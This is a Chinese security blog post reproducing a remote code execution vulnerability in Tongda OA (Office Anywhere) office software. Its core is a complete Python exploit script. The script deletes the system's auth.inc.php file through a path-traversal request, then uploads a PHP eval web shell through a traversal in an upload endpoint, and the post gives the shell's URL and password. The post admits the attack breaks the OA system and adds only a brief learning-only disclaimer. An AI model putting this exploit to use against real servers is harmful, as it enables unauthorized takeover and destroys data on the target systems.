通达OA 0day RCE漏洞复现

  • A+
所属分类:安全文章

0x01 漏洞描述

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。

通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。


0x02 环境搭建

此过程略(傻瓜式一键安装)

auth_inc.php 文件这里先做个备份,以防止在利用exp删除之后可以恢复OA系统(这是在本地搭建,若果在客户现场测试建议客户先做好备份)

通达OA 0day RCE漏洞复现

搭建成功之后登录系统是这个酱紫

通达OA 0day RCE漏洞复现

通达OA 0day RCE漏洞复现

0x03 漏洞复现

直接甩出某大佬写的exp(简单粗暴)

import requests
target="http://192.168.168.130/"payload="<?php eval($_POST['agan']);?>"print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")input("Press enter to continue")print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"requests.get(url=url)print("[*]Checking if file deleted...")url=target+"/inc/auth.inc.php"page=requests.get(url=url).textif 'No input file specified.' not in page: print("[-]Failed to deleted auth.inc.php") exit(-1)print("[+]Successfully deleted auth.inc.php!")print("[*]Uploading payload...")url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"files = {'FILE1': ('agan.php', payload)}requests.post(url=url,files=files)url=target+"/_agan.php"page=requests.get(url=url).textif 'No input file specified.' not in page: print("[+]Filed Uploaded Successfully") print("[+]URL:",url)else: print("[-]Failed to upload file")

成功利用,连接地址

http://192.168.142.130/_agan.php // 密码:agan

通达OA 0day RCE漏洞复现

虽然getshell但是OA系统已损坏

通达OA 0day RCE漏洞复现


仅供学习参考,切勿用于非法用途,复现漏洞建议自行搭建环境,切勿直接用网上搜索引擎搜索测试

0x04 参考链接

https://blog.csdn.net/God_XiangYu/article/details/108091470


通达OA 0day RCE漏洞复现

通达OA 0day RCE漏洞复现


发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: